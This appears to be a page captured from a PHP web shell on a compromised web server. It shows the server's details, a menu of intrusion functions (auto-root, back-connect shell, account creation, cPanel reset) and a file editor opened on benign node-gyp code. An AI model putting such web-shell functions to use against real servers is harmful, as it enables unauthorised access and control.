Linux lorencats.com 5.10.103-v7l+ #1529 SMP Tue Mar 8 12:24:00 GMT 2022 armv7l
Apache/2.4.59 (Raspbian)
: 10.0.0.29 | : 216.73.216.10
Cant Read [ /etc/named.conf ]
7.3.31-1~deb10u7
root
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
usr /
share /
node-gyp /
lib /
[ HOME SHELL ]
Name
Size
Permission
Action
Find-VS2017.cs
9.34
KB
-rw-r--r--
build.js
7.24
KB
-rw-r--r--
clean.js
378
B
-rw-r--r--
configure.js
17.42
KB
-rw-r--r--
find-node-directory.js
2.33
KB
-rw-r--r--
find-vs2017.js
1.53
KB
-rw-r--r--
install.js
14.48
KB
-rw-r--r--
list.js
718
B
-rw-r--r--
node-gyp.js
4.76
KB
-rw-r--r--
process-release.js
5.99
KB
-rw-r--r--
rebuild.js
308
B
-rw-r--r--
remove.js
1.29
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : find-vs2017.js
var log = require('npmlog') , execFile = require('child_process').execFile , path = require('path') function findVS2017(callback) { var ps = path.join(process.env.SystemRoot, 'System32', 'WindowsPowerShell', 'v1.0', 'powershell.exe') var csFile = path.join(__dirname, 'Find-VS2017.cs') var psArgs = ['-ExecutionPolicy', 'Unrestricted', '-NoProfile', '-Command', '&{Add-Type -Path \'' + csFile + '\';' + '[VisualStudioConfiguration.Main]::Query()}'] log.silly('find vs2017', 'Running', ps, psArgs) var child = execFile(ps, psArgs, { encoding: 'utf8' }, function (err, stdout, stderr) { log.silly('find vs2017', 'PS err:', err) log.silly('find vs2017', 'PS stdout:', stdout) log.silly('find vs2017', 'PS stderr:', stderr) if (err) return callback(new Error('Could not use PowerShell to find VS2017')) var vsSetup try { vsSetup = JSON.parse(stdout) } catch (e) { log.silly('find vs2017', e) return callback(new Error('Could not use PowerShell to find VS2017')) } log.silly('find vs2017', 'vsSetup:', vsSetup) if (vsSetup && vsSetup.log) log.verbose('find vs2017', vsSetup.log.trimRight()) if (!vsSetup || !vsSetup.path || !vsSetup.sdk) { return callback(new Error('No usable installation of VS2017 found')) } log.verbose('find vs2017', 'using installation:', vsSetup.path) callback(null, { "path": vsSetup.path, "sdk": vsSetup.sdk }) }) child.stdin.end() } module.exports = findVS2017
Close